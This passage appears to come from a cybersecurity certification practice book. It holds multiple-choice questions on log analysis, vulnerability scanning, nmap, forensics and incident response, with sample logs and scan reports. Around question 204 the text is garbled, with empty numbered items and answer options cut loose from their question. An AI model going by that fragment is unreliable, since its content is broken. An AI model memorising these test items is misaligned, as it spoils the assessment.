Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: pam_unix(sshd:session): session opened for user ec2-user by (uid=0)
Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=pts/0 ; PWD=/home/ec2-user ; USER=root ; COMMAND=/bin/bash

187. What is the IP address of the system where the user was logged in when he or she initiated the connection?
A. 172.30.0.62
B. 62:0:30.172
C. 10.174.238.88
D. 9.48.6.0

188. What service did the user use to connect to the server?
A. HTTPS
B. PTS
C. SSH
D. Telnet

189. What authentication technique did the user use to connect to the server?
A. Password
B. PKI
C. Token
D. Biometric

190. What account did the individual use to connect to the server?
A. root
B. ec2-user
C. bash
D. pam_unix

Questions 191-194 refer to the following scenario:

Maggie is reviewing the ssl_request_log file on a web server operated by her company and sees the messages shown here:

[30/Aug/2017:09:47:25 -0400] 129.74.238.88 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /wp-content/themes/bridge/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.6.3 HTTP/1.1" -
[30/Aug/2017:09:47:32 -0400] 54.204.189.233 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 31266
[30/Aug/2017:09:49:34 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET /robots.txt HTTP/1.1" -
[30/Aug/2017:09:49:35 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET /robots.txt HTTP/1.1" 67
[30/Aug/2017:09:49:35 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET /robots.txt HTTP/1.1" -
[30/Aug/2017:09:49:36 -0400] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET /robots.txt HTTP/1.1" 67
[30/Aug/2017:09:49:41 -0400] 157.55.39.166 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" -
[30/Aug/2017:09:58:03 -0400] 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /about-me/ HTTP/1.1" 6605
[30/Aug/2017:09:58:04 -0400] 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /wp-content/uploads/2017/04/about-me-page_PSD_03.jpg HTTP/1.1" 98820
[30/Aug/2017:09:58:04 -0400] 188.71.247.207 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /wp-content/uploads/2017/04/about-me-page_PSD_02.jpg HTTP/1.1" 224717
[root@ip-172-30-0-60 httpd]#

191. What type of user is most likely originating from the IP address 157.55.39.18?
A. Malicious hacker
B. Search engine crawler
C. Normal web user
D. API user

192. What type of user is most likely originating from the IP address 188.71.247.207?
A. Malicious hacker
B. Search engine crawler
C. Normal web user
D. API user

193. Which one of the following conclusions can Maggie reach about the web server based upon interpreting the logs?
A. The web server is using an insecure version of TLS.
B. The web server is using an insecure version of SSL.
C. The web server is using outdated ciphers.
D. None of the above

194. Based upon Maggie’s review of the logs, which one of the following statements is correct?
A. The server allows encrypted connections.
B. The server does not allow unencrypted connections.
C. The server does not allow access by web crawlers.
D. The server contains network access restrictions.

195. Which one of the following components is not normally part of an endpoint security suite?
A. IPS
B. Firewall
C. Antimalware
D. VPN

196. Wanda is responsible for account life-cycle management at her organization and would like to streamline the process, which she feels is ineffective and contains too many steps. Which one of the following approaches may assist with this task?
A. Regression
B. Waterfall
C. Agile
D. Lean Six Sigma

Questions 197-200 refer to the following scenario:

Veronica was recently hired to develop a vulnerability management program for her organization. The organization currently does not have any tools for vulnerability scanning, and Veronica would like to build out the initial toolset.

197. Veronica would like to select a network vulnerability scanner that is provided by a commercial vendor and widely used within the cybersecurity community. Which one of the following tools would best meet her needs?
A. OpenVAS
B. MBSA
C. Acunetix
D. Qualys

198. Veronica would like to supplement her network vulnerability scanner with a solution that can specifically identify flaws in Windows servers. Which tool would best meet her needs?
A. MBSA
B. Acunetix
C. Nexpose
D. Nikto

199. After purchasing a commercial network vulnerability scanner, Veronica does not have any funds remaining to purchase a web application scanner, so she would like to use an open source solution dedicated to that purpose. Which one of the following products would best meet her needs?
A. Acunetix
B. OpenVAS
C. Nikto
D. Nexpose

200. As she continues her product selection, Veronica realizes that the organization does not have adequate network monitoring and log analysis tools. She would like to select a suite of open source tools that would provide her with comprehensive monitoring. Which one of the following tools would be the least appropriate to include in that set?
A. Cacti
B. MRTG
C. Solarwinds
D. Nagios

201. Jacob would like to standardize logging across his organization, which consists of a mixture of Windows and Linux systems as well as Cisco network devices. Which logging approach would work best for Jacob?
A. Syslog
B. Event Viewer
C. SCCM
D. Prime

202. The Open Web Application Security Project (OWASP) maintains a listing of the most important web application security controls. Which one of these items is least likely to appear on that list?
A. Implement identity and authentication controls.
B. Implement appropriate access controls.
C. Obscure web interface locations.
D. Leverage security frameworks and libraries.

203. Javier ran the shasum command two consecutive times on a file named coal.r and saw the results shown here. What conclusion can Javier draw from this result?

mchapple $shasum coal.r
84bf8c31726c2137fd4383999c2f5e943ff7fcbe  coal.r
mchapple $
mchapple $
mchapple $
mchapple $shasum coal.r
48c001694967435fc5b3c430007a41eff3db7569  coal.r
mchapple $

A. The file is intact.
B. The file was modified.
C. The file was removed.
D. Javier cannot reach any of these conclusions based upon the limited evidence available to him.
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204. Leo is investigating a security incident and turned to the logs from his identity and access 
management system to determine the last time that a specific user authenticated to any 
system in the organization. What identity and access management function is Leo using? 


205. 


206. 


207. 


A. 
B. 
C. 
D. 


Identification 
Authentication 
Authorization 


Accounting 


205. Tim is a web developer and would like to protect a new web application from man-in-the-middle attacks that steal session tokens stored in cookies. Which one of the following security controls would best prevent this type of attack?

A. Forcing the use of TLS for the web application
B. Forcing the use of SSL for the web application
C. Setting the secure attribute on the cookie
D. Hashing the cookie value


206. What type of malicious software might an attacker use in an attempt to maintain access to a system while hiding his or her presence on the system?

A. Rootkit
B. Worm
C. Trojan horse
D. Virus


207. Max is the security administrator for an organization that implements a remote-access VPN. The VPN depends upon RADIUS authentication, and Max would like to assess the security of that service. Which one of the following is the strongest cryptographic hash function supported by RADIUS?

A. MD5
B. SHA-1
C. SHA-512
D. HMAC
208. Laura requests DNS information about the nytimes.com domain using the nslookup command and receives the results shown here. Which one of the following conclusions can Laura reach about the domain based upon these results?

> nytimes.com
;; Truncated, retrying in TCP mode.
Server:  66.205.160.99
Address: 66.205.160.99#53

Non-authoritative answer:
nytimes.com rdata_257 = \# 19 0005697373756573796D616E7465632E636F6D
nytimes.com rdata_257 = \# 19 00056973737565636F6D6F646F63612E636F6D
nytimes.com rdata_257 = \# 19 0005697373756564696769636572742E636F6D
nytimes.com text = "google-site-verification=ZsySMeZ_SRbJZFu-S3ptepytP7hSpxHO@qAg8Z2bKug"
nytimes.com text = "MS=ms22827202"
nytimes.com text = "253961548-4297453"
nytimes.com text = "google-site-verification=4TE2qgqBoy6PktLjtZ03t32A20EZO@VDOPYE6MnTj 8IL_g"
nytimes.com text = "MS=A1BFCA84E21B7011CA98DFSDC251CDDF90E0174B"
nytimes.com text = "adobe-idp-site-verification=5ce4d99c-af0a-4b76-9217-bd49d3336d FO"
nytimes.com text = "v=spf1 mx ptr ip4:170.149.160.0/19 ip4:209.11.220.51/32 include:alerts.wallst.com
ndgrid.net include:_spf.google.com include:inyt.com ~all"
nytimes.com text = "google-site-verification=jZcmQFxPEP38yqYpmRvoOv_ShQFAGBZPUEBwTNUPUF8"
nytimes.com mail exchanger = 1 ASPMX.L.GOOGLE.com.
nytimes.com mail exchanger = 10 ASPMX2.GOOGLEMAIL.com.
nytimes.com mail exchanger = 10 ASPMX3.GOOGLEMAIL.com.
nytimes.com mail exchanger = 5 ALT1.ASPMX.L.GOOGLE.com.
nytimes.com mail exchanger = 5 ALT2.ASPMX.L.GOOGLE.com.
nytimes.com
        origin = ns1.p24.dynect.net
        mail addr = hostmaster.nytimes.com
        serial = 2017091015
        refresh = 300
        retry = 150
        expire = 1209600
        minimum = 300
Name:    nytimes.com
Address: 151.101.65.164
Name:    nytimes.com
Address: 151.101.1.164
Name:    nytimes.com
Address: 151.101.129.164
Name:    nytimes.com
Address: 151.101.193.164
nytimes.com nameserver = ns1.p24.dynect.net.
nytimes.com nameserver = ns2.p24.dynect.net.
nytimes.com nameserver = dns-plx.ewrl.nytimes.com.
nytimes.com nameserver = dns-plx.seal.nytimes.com.
nytimes.com nameserver = ns3.p24.dynect.net.
nytimes.com nameserver = ns4.p24.dynect.net.

A. The nytimes.com DNS server is located at 66.205.160.99.
B. The nytimes.com web server has a single address.
C. The nytimes.com email domain is hosted by Google.
D. The nytimes.com website uses Google Analytics.


Questions 209-211 refer to the following scenario: 


Cody recently detected unusual activity on a set of servers running in his organization’s 
data center. He discovered that these servers were running at close to 100% capacity for 
extended periods of time. After performing a historical analysis, he determined that this 
was unusual, as the servers rarely reached full utilization during the previous year. He then 
reviewed the processes on those servers and found that they were running cryptocurrency 
mining software. 
209. Which one of the following sources of information would be most useful to Cody as he seeks to determine the identity of the individual responsible for the installation of this software?

A. Server logs
B. Netflow records
C. Kerberos logs
D. IPS logs

210. If Cody determines that an individual installed this software for personal gain, which one of the following security policies was most likely violated?

A. Information classification policy
B. Acceptable use policy
C. Bitcoin mining policy
D. Identity management policy

211. Based upon his analysis, what type of control might Cody consider implementing to more quickly identify similar issues in the future?

A. Intrusion prevention
B. Authentication anomaly detection
C. Vulnerability scanning
D. Configuration management

212. Xavier is reviewing the design for his organization’s security program and he is concerned about the ability of the organization to conduct malware analysis that would detect zero-day attacks. Which one of the following cloud-based service models would allow Xavier to most easily meet this requirement?

A. IaaS
B. PaaS
C. SECaaS
D. IDaaS


213. Glenn would like to adopt a web application firewall for his company. Which one of the following products would NOT be suitable for his first round of evaluation?

A. Imperva
B. NAXSI
C. Network General
D. ModSecurity
214. Vincent is conducting fuzz testing using Peach Fuzzer, a common input fuzzing tool. Peach Fuzzer incorporates functionality formerly included in the Untidy fuzzer project. Which one of the following sources is Vincent LEAST likely to be able to fuzz with this product?

A. Web application input
B. XML
C. TCP/IP
D. Firewall rules


215. Lynda is a security professional consulting with her organization’s software development team on the inclusion of security best practices in their SDLC. She consults the Center for Internet Security’s system design recommendations. Which one of the following control categories is most likely to contain information helpful to her consulting effort?

A. Inventory of authorized and unauthorized devices
B. Controlled use of administrative privileges
C. Application software security
D. Malware defenses


Practice Exam 1 
1. While reviewing network flow logs, John sees that network flow on a particular segment suddenly dropped to zero. What is the most likely cause of this?

A. A denial-of-service attack
B. A link failure
C. High bandwidth consumption
D. Beaconing

2. Charlotte is having a dispute with a co-worker over access to information contained in a database maintained by her co-worker’s department. Charlotte insists that she needs the information to carry out her job responsibilities, while the co-worker insists that nobody outside the department is allowed to access the information. Charlotte does not agree that the other department should be able to make this decision, and Charlotte’s supervisor agrees with her. What type of policy could Charlotte turn to for the most applicable guidance?

A. Data classification policy
B. Data retention policy
C. Data ownership policy
D. Acceptable use policy

3. Frank is conducting the recovery process after his organization experienced a security incident. During that process, he plans to apply patches to all of the systems in his environment. Which one of the following should be his highest priority for patching?

A. Windows systems
B. Systems involved in the incident
C. Linux systems
D. Web servers


4. Susan’s organization suffered from a major breach that was attributed to an advanced persistent threat (APT) that used exploits of zero-day vulnerabilities to gain control of systems on her company’s network. Which of the following is the least appropriate solution for Susan to recommend to help prevent future attacks of this type?

A. Heuristic attack detection methods
B. Signature-based attack detection methods
C. Segmentation
D. Leverage threat intelligence

5. During his investigation of a Windows system, Eric discovered that files were deleted and wants to determine whether a specific file previously existed on the computer. Which of the following is the least likely to be a potential location to discover evidence supporting that theory?

A. Windows registry
B. Master File Table
C. INDX files
D. Event logs


6. As part of her duties as an SOC analyst, Emily is tasked with monitoring intrusion detection sensors that cover her employer’s corporate headquarters network. During her shift, Emily’s IDS alarms report that a network scan has occurred from a system with IP address 10.0.11.19 on the organization’s WPA2 enterprise wireless network aimed at systems in the finance division. What data source should she check first?

A. Host firewall logs
B. AD authentication logs
C. Wireless authentication logs
D. WAF logs


7. Casey’s incident response process leads her to a production server that must stay online for her company’s business to remain operational. What method should she use to capture the data she needs?

A. Live image to an external drive.
B. Live image to the system’s primary drive.
C. Take the system offline and image to an external drive.
D. Take the system offline, install a write blocker on the system’s primary drive, and then image it to an external drive.


8. During a routine upgrade, Maria inadvertently changes the permissions to a critical directory, causing an outage of her organization’s RADIUS infrastructure. How should this threat be categorized using NIST’s threat categories?

A. Adversarial
B. Accidental
C. Structural
D. Environmental


9. What does the nmap response “filtered” mean in port scan results?

A. nmap cannot tell whether the port is open or closed.
B. A firewall was detected.
C. An IPS was detected.
D. There is no application listening, but there may be one at any time.

10. Darcy is the security administrator for a hospital that operates in the United States and is subject to the Health Insurance Portability and Accountability Act (HIPAA). She is designing a vulnerability scanning program for the hospital’s data center that stores and processes electronic protected health information (ePHI). What is the minimum scanning frequency for this environment, assuming that the scan shows no critical vulnerabilities?

A. Every 30 days
B. Every 90 days
C. Every 180 days
D. No scanning is required.
11. During her review of incident logs, Laura discovers the initial entry via SSH on a front-facing bastion host (A) at 8:02 a.m. If the network that Laura is responsible for is designed as shown here, what is the most likely diagnosis if the second intrusion shows up on host B at 7:15 a.m.?

[Diagram: A (SSH bastion host) connects through a Firewall to B (internal management system)]

Stateful firewall ruleset:
1. Allow A -> B via tcp 22.
2. Deny all.

A. Internal host B was previously compromised.
B. Host A was compromised; then host B was compromised.
C. Host B and host A are not both synchronized to NTP properly.
D. An internal threat compromised host B and then host A.
12. Matt recently ran a vulnerability scan of his organization’s network and received the results shown here. He would like to remediate the server with the highest number of the most serious vulnerabilities first. Which one of the following servers should be on his highest priority list?

[Figure: vulnerability scan results chart for Server A, Server B, Server C, and Server D; bar values are not legible]

A. Server A
B. Server B
C. Server C
D. Server D


13. Frank has been tasked with conducting a risk assessment for the midsize bank that he works at because of a recent compromise of their online banking web application. Frank has chosen to use the NIST 800-30 risk assessment framework shown here. What likelihood of occurrence should he assign to breaches of the web application?

[Figure: NIST SP 800-30 risk assessment process]
Step 1: Prepare for Assessment (Derived from Organizational Risk Frame)
Step 2: Conduct Assessment (Expanded Task View):
    Identify Threat Sources and Events
    Identify Vulnerabilities and Predisposing Conditions
    Determine Likelihood of Occurrence
    Determine Magnitude of Impact
    Determine Risk
Step 3: Communicate Results
Step 4: Maintain Assessment

A. Low
B. Medium
C. High
D. Cannot be determined from the information given
14. Hank’s boss recently came back from a CEO summit event where he learned about the importance of cybersecurity and the role of vulnerability scanning. He asked Hank about the vulnerability scans conducted by the organization and suggested that instead of running weekly scans that they simply configure the scanner to start a new scan immediately after the prior scan completes. How should Hank react to this request?

A. Hank should inform the CEO that this would have a negative impact on system performance and is not recommended.
B. Hank should immediately implement the CEO’s suggestion.
C. Hank should consider the request and work with networking and engineering teams on possible implementation.
D. Hank should inform the CEO that there is no incremental security benefit from this approach and that he does not recommend it.

15. Selah’s organization suffers an outage of its point-to-point encrypted VPN because of a system compromise at its ISP. What type of issue is this?

A. Confidentiality
B. Availability
C. Integrity
D. Accountability


16. Garrett is working with a database administrator to correct security issues on several servers managed by the database team. He would like to extract a report for the DBA that will provide useful information to assist in the remediation effort. Of the report templates shown here, which would be most useful to the DBA team?

Title                                          Vulnerability Data
2008 SANS Top 20 Report                        Host Based
Executive Report                               Host Based
High Severity Report                           Host Based
Payment Card Industry (PCI) Executive Report   Scan Based
Payment Card Industry (PCI) Technical Report   Scan Based
Qualys Patch Report                            Host Based
Qualys Top 20 Report                           Host Based
Technical Report                               Host Based
Unknown Device Report                          Scan Based

A. Qualys Top 20 Report
B. Payment Card Industry (PCI) Technical Report
C. Executive Report
D. Technical Report


17. Bob’s Solarwinds network monitoring tools provide data about a system hosted in Amazon’s AWS environment. When Bob checks his server’s average response time, he sees the results shown here.

[Figure: Solarwinds "Min/Max/Average Response Time & Packet Loss" chart for AMI (AWS), Apr 21 2017, 12:30 pm to Apr 22 2017, 12:30 pm; y-axis is response time in milliseconds (0 ms to 1500 ms); plotted series are Average Response Time AMI (AWS), Percentile 95%, Min/Max Response Time AMI (AWS), and % Packet Loss AMI (AWS)]

What action should Bob take based on this information?

A. He should increase the speed of his network link.
B. He should check for scheduled tasks at the times he sees spikes.
C. He should ensure that his network card has the proper latency settings.
D. He should perform additional diagnostics to determine the cause of the latency.


18. Alex notices the traffic shown here during a Wireshark packet capture. What is the host with IP address 10.0.2.11 most likely doing?

No.  Time         Source     Destination  Protocol  Length  Info
3    0.023433501  10.0.2.11  192.168.1.1  DNS       82      Standard query 0x4daa PTR 15.2.0.10.in-addr.arpa
7    0.072131619  10.0.2.11  10.0.2.15    TCP       60      36410 → 1723 [SYN] Seq=0 Win=1024 Len=0 MSS=1460

A. UDP-based port scanning
B. Network discovery via TCP
C. SYN based port scanning
D. DNS based discovery

19. Jenny is evaluating the security of her organization’s network management practices. She discovers that the organization is using RADIUS for administrator authentication to network devices. What additional security control should also be in place to ensure secure operation?

A. IPsec
B. Kerberos
C. TACACS+
D. SSL


20. Jake is building a forensic image of a compromised drive using the dd command with its default settings. He finds that the imaging is going very slowly. What parameter should he adjust first?

A. if
B. bs
C. of
D. count

21. What purpose does a honeypot system serve when placed on a network as shown here?

[Diagram: network with a Border Router, a Firewall or Unified Security Device, an Internal Trusted Zone, and a Honeypot]

A. It prevents attackers from targeting production servers.
B. It provides information about the techniques attackers are using.
C. It slows down attackers like sticky honey.
D. It provides real-time input to IDSs and IPSs.


22. Danielle’s security team has found consistent evidence of system compromise over a period of weeks, with additional evidence pointing to the systems they are investigating being compromised for years. Despite her team’s best efforts, Danielle has found that her team cannot seem to track down and completely remove the compromise. What type of attack is Danielle likely dealing with?

A. A Trojan horse
B. An APT
C. A rootkit
D. A zero-day attack

23. Which one of the following metrics would be most useful in determining the effectiveness of a vulnerability remediation program?

A. Number of critical vulnerabilities resolved
B. Time to resolve critical vulnerabilities
C. Number of new critical vulnerabilities per month
D. Time to complete vulnerability scans

24. Mike’s nmap scan of a system using the command nmap 192.168.1.100 does not return any results. What does Mike know about the system if he is sure of its IP address, and why?

A. The system is not running any open services.
B. All services are firewalled.
C. There are no TCP services reachable on nmap’s default 1000 TCP ports.
D. There are no TCP services reachable on nmap’s default 65535 TCP ports.


25. What is the purpose of creating an MD5 hash for a drive during the forensic imaging process?

A. To prove that the drive’s contents were not altered
B. To prove that no data was deleted from the drive
C. To prove that no files were placed on the drive
D. All of the above


26. After completing his unsuccessful forensic analysis of the hard drive from a workstation that was compromised by malware, Ben sends it to be re-imaged and patched by his company’s desktop support team. Shortly after the system returns to service, the device once again connects to the same botnet. What action should Ben take as part of his next forensic review if this is the only system showing symptoms like this?

A. Verify that all patches are installed.
B. Destroy the system.
C. Validate the BIOS hash against a known good version.
D. Check for a system with a duplicate MAC address.
27. Part of the forensic data that Susan was provided for her investigation was a Wireshark packet capture. The investigation is aimed at determining what type of media an employee was consuming during work. What is the more detailed analysis that Susan can do if she is provided with the data shown here?

Filter: tcp.stream eq 2

No.  Time       Source          Destination     Protocol  Length  Info
304  14.190515  137.30.120.37   137.30.123.234  TCP       1514    [TCP segment of a reassembled PDU]
305  14.190738  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [ACK] Seq=705 Ack=79467 Win=64240 Len=0
306  14.191695  137.30.120.37   137.30.123.234  TCP       1514    [TCP segment of a reassembled PDU]
307  14.194417  137.30.120.37   137.30.123.234  TCP       1514    [TCP segment of a reassembled PDU]
308  14.194649  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [ACK] Seq=705 Ack=82387 Win=64240 Len=0
309  14.195589  137.30.120.37   137.30.123.234  TCP       1514    [TCP segment of a reassembled PDU]
310  14.197053  137.30.120.37   137.30.123.234  TCP       1514    [TCP segment of a reassembled PDU]
311  14.197244  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [ACK] Seq=705 Ack=85307 Win=64240 Len=0
312  14.197534  137.30.120.37   137.30.123.234  HTTP      675     HTTP/1.1 200 OK (GIF89a)
313  14.318083  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [ACK] Seq=705 Ack=85928 Win=63619 Len=0
320  23.394385  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [FIN, ACK] Seq=705 Ack=85928 Win=63619 Len=0
323  23.395031  137.30.120.37   137.30.123.234  TCP       60      http > submitserver [ACK] Seq=85928 Ack=706 Win=49206 Len=0
326  23.395760  137.30.120.37   137.30.123.234  TCP       60      http > submitserver [FIN, ACK] Seq=85928 Ack=706 Win=49206 Len=0
327  23.395790  137.30.123.234  137.30.120.37   TCP       54      submitserver > http [ACK] Seq=706 Ack=85929 Win=63619 Len=0

A. She can determine that the user was viewing a GIF.
B. She can manually review the TCP stream to see what data was sent.
C. She can export and view the GIF.
D. She cannot determine what media was accessed using this data set.


28. Which one of the following is not a characteristic of an information systems security audit?

A. Conducted on behalf of a third party
B. Result in a formal statement
C. Use informal interviews rather than rigorous, formal testing
D. May be conducted by internal groups

29. Mark is a cybersecurity analyst for a large company but is helping a nonprofit organization in his free time. He would like to begin a vulnerability scanning program for that company but does not have any funds available to purchase a tool. What open source tool can he use?

A. Qualys
B. Nessus
C. Nexpose
D. OpenVAS


30. Mika wants to run an nmap scan that includes all TCP ports and uses service detection. Which of the following nmap commands should she execute?

A. nmap -p0 -all -SC
B. nmap -p 1-32768 -sVS
C. nmap -p 1-65535 -sV -sS
D. nmap -all -sVS
31. Which of the following is not classified as an eradication by CompTIA?

A. Patching
B. Sanitization
C. Reconstruction
D. Secure disposal


32. Dan is a cybersecurity analyst for a healthcare organization. He ran a vulnerability scan of the VPN server used by his organization. His scan ran from inside the data center against a VPN server also located in the data center. The complete vulnerability report is shown here. What action should Dan take next?

172.19.… (VPN server; hostname illegible)

Vulnerabilities (1)

1  Non-Zero Padding Bytes Observed in Ethernet Packets    CVSS: -   CVSS3: -   Active
First Detected: 07/16/2014 at 20:06:22 (GMT-0400)   Last Detected: 04/05/2017 at 01:06:21 (GMT-0400)   Times Detected: 33   Last Fixed: 01/07/2015 at 21:03:15 (GMT-0400)
QID: 82048                       CVSS Base: -
Category: TCP/IP                 CVSS Temporal: 0
CVE ID: -                        CVSS3 Base: -
Vendor Reference: -              CVSS3 Temporal: -
Bugtraq ID: -                    CVSS Environment:
Service Modified: 05/26/2009     Asset Group: -
User Modified: -                 Collateral Damage Potential: -
Edited: No                       Target Distribution: -
PCI Vuln: No                     Confidentiality Requirement: -
Ticket State: -                  Integrity Requirement: -
                                 Availability Requirement: -

THREAT:
Ethernet standards impose strict limitations on the size of encapsulated packets, requiring small packets to be padded up to a minimum size using zero padding bytes (for example, 0x00). The service detected that the small packets from the host were padded to the minimum size using non-zero padding bytes, as shown in the Results section.

IMPACT:
This weakness may be exploited to fingerprint the Ethernet cards and device drivers.

SOLUTION:
Contact the vendor of the Ethernet cards and device drivers for the availability of a patch.

EXPLOITABILITY:
There is no exploitability information for this vulnerability.

A. Dan should immediately remediate this vulnerability.
B. Dan should schedule the vulnerability for remediation within the next 30 days.
C. Dan should rerun the scan because this is likely a false positive report.
D. Dan should take no action.


33. Gina is testing a firewall ruleset for use on her organization’s new CheckPoint firewall. She would like the firewall to allow unrestricted web browsing for users on the internal network, with the exception of sites listed on a Blocked Hosts list that the cybersecurity team maintains. She designed the ruleset shown here. What, if any, error does it contain?

[Table: firewall ruleset with columns Source Network, Destination Network, Destination Ports; one row lists Destination Network = Blocked Hosts and Destination Ports = 80, 443; the remaining cells are not legible]

A. Promiscuous rule
B. Orphaned rule
C. Shadowed rule
D. The rule base does not contain an error.


34. Jay received an alert from his organization’s SIEM that it detected a potential attack against a web server on his network. However, he is unsure whether the traffic generating the alert actually entered the network from an external source or whether it came from inside the network. The NAT policy at the network perimeter firewall rewrites public IP addresses, making it difficult to assess this information based upon IP addresses. Jay would like to perform a manual log review to locate the source of the traffic. Where should he turn for the best information?

A. Application server logs
B. Database server logs
C. Firewall logs
D. Antimalware logs


35. Jim ran a traceroute command to discover the network path between his system and the CompTIA website. He received the results shown here. What can he conclude from these results?

~$ traceroute www.comptia.org
traceroute to www.comptia.org (198.134.5.6), 30 hops max, 60 byte packets
 1  216.182.225.74 (216.182.225.74) 13.619 ms 216.182.226.92 (216.182.226.92) 19.493 ms 216.182.226.80 (216.182.226.80) 16.713 ms
 2  100.66.8.8 (100.66.8.8) 17.456 ms 100.66.9.220 (100.66.9.220) 12.102 ms 100.66.9.216 (100.66.9.216) 16.374 ms
 3  100.66.15.82 (100.66.15.82) 16.938 ms 100.66.10.136 (100.66.10.136) 19.499 ms 100.66.14.40 (100.66.14.40) 12.238 ms
 4  100.66.6.169 (100.66.6.169) 21.560 ms 100.66.7.99 (100.66.7.99) 12.254 ms 100.66.6.113 (100.66.6.113) 16.032 ms
 5  100.66.4.87 (100.66.4.87) 21.326 ms 100.66.4.159 (100.66.4.159) 21.698 ms 100.66.4.55 (100.66.4.55) 21.433 ms
 6  100.65.8.1 (100.65.8.1) 0.800 ms 100.65.11.161 (100.65.11.161) 0.347 ms 100.65.8.225 (100.65.8.225) 0.382 ms
 7  52.93.24.76 (52.93.24.76) 17.369 ms 205.251.245.253 (205.251.245.253) 1.269 ms 205.251.244.206 (205.251.244.206) 0.776 ms
 8  54.239.109.46 (54.239.109.46) 2.318 ms 52.93.24.95 (52.93.24.95) 0.726 ms 54.239.111.96 (54.239.111.96) 5.132 ms
 9  54.239.111.102 (54.239.111.102) 25.935 ms 54.239.108.81 (54.239.108.81) 0.984 ms 54.239.109.250 (54.239.109.250) 19.773 ms
10  * * 54.239.109.63 (54.239.109.63) 1.363 ms
11  * * 52.95.62.30 (52.95.62.30) 25.338 ms
12  52.95.62.142 (52.95.62.142) 26.541 ms 52.95.62.57 (52.95.62.57) 19.524 ms 52.95.62.76 (52.95.62.76) 26.906 ms
13  52.95.62.73 (52.95.62.73) 19.577 ms 52.95.62.57 (52.95.62.57) 19.699 ms 52.95.216.121 (52.95.216.121) 19.690 ms
14  vb2000d2.rar3.chicago-il.us.xo.net (207.88.13.6) 20.363 ms 52.95.216.121 (52.95.216.121) 19.125 ms vb2000d2.rar3.chicago-il.us.xo.net (207.88.13.6) 19.776 ms
15  vb2000d2.rar3.chicago-il.us.xo.net (207.88.13.6) 19.740 ms 20.469 ms 216.156.16.199.ptr.us.xo.net (216.156.16.199) 20.207 ms
16  216.55.11.62 (216.55.11.62) 21.566 ms 21.408 ms 21.488 ms
17  * * 216.55.11.62 (216.55.11.62) 21.498 ms
18  * * *
19  * * *
20  * * *
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *
~$

A. The CompTIA website is located in Chicago.
B. The CompTIA website is down.
C. The closest network device to the CompTIA site that Jim can identify is 216.182.225.74.
D. The closest network device to the CompTIA site that Jim can identify is 216.55.11.62.
36. Which one of the following types of vulnerability scans would provide the least information about the security configuration of a system?

A. Agent-based scan
B. Credentialed scan
C. Uncredentialed internal scan
D. Uncredentialed external scan


37. After finishing a forensic case, Sam needs to wipe the media that he is using to prepare it for the next case. Which of the following methods is best suited to preparing the hard drive that he will use if he wants to be in compliance with NIST SP 800-88?

A. Degauss the drive.
B. Zero write the drive.
C. Seven rounds: all ones, all zeros, and five rounds of random values
D. Use the ATA Secure Erase command.


38. After reading the NIST standards for incident response, Chris spends time configuring the NTP service on each of his servers, workstations, and appliances throughout his network. What phase of the incident response process is he working to improve?

A. Preparation
B. Detection and analysis
C. Containment, eradication, and recovery
D. Post-incident activity

39. Susan is the ISO for her company and is notified that a zero-day exploit has been released that can result in remote code execution on all Windows 10 workstations on her network because of an attack against Windows domain services. She wants to limit her exposure to this exploit but needs the systems to continue to be able to access the Internet. Which of the following approaches is best for her response?

A. Firewalling
B. Patching
C. Isolation
D. Segmentation


40. Fred has configured SNMP to gather information from his network devices and issues the following command:

$ snmpgetnext -v 1 -c public device1 \
    ip.ipRouteTable.ipRouteEntry.ipRouteDest \
    ip.ipRouteTable.ipRouteEntry.ipRouteNextHop

He receives a response that includes the following data:

ip.ipRouteTable.ipRouteEntry.ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.0.0.0.0 = IpAddress: 10.0.11.1

What local command could he have executed to gather the same information?

A. traceroute
B. route add default gw 10.0.11.1
C. netstat -nr
D. ping -r 10.0.11.1


264 Chapter 5 ■ Practice Exam 1


41. After scanning a network device located in her organization’s data center, Shannon noted the vulnerability shown here. What is the minimum version level of SNMP that Shannon should be running?

Vulnerabilities (21)

5  EOL/Obsolete Software: SNMP Version Detected    CVSS: -   CVSS3: -   Active
First Detected: 02/04/2017 at 22:15:28 (GMT-0400)   Last Detected: 04/05/2017 at 03:01:18 (GMT-0400)   Times Detected: 3   Last Fixed: N/A
QID: 105459                      CVSS Base: 6.4
Category: Security Policy        CVSS Temporal: 5.4
CVE ID: -                        CVSS3 Base: -
Vendor Reference: -              CVSS3 Temporal: -
Bugtraq ID: -                    CVSS Environment:
Service Modified: 03/10/2017     Asset Group: -
User Modified: -                 Collateral Damage Potential: -
Edited: No                       Target Distribution: -
PCI Vuln: Yes                    Confidentiality Requirement: -
Ticket State: Open               Integrity Requirement: -
                                 Availability Requirement: -

A. 1.1
B. 1.2
C. 2
D. 3


42. When Frank was called in to help with an incident recovery effort, he discovered that the network administrator had configured the network as shown here. What type of incident response action best describes what Frank has encountered?

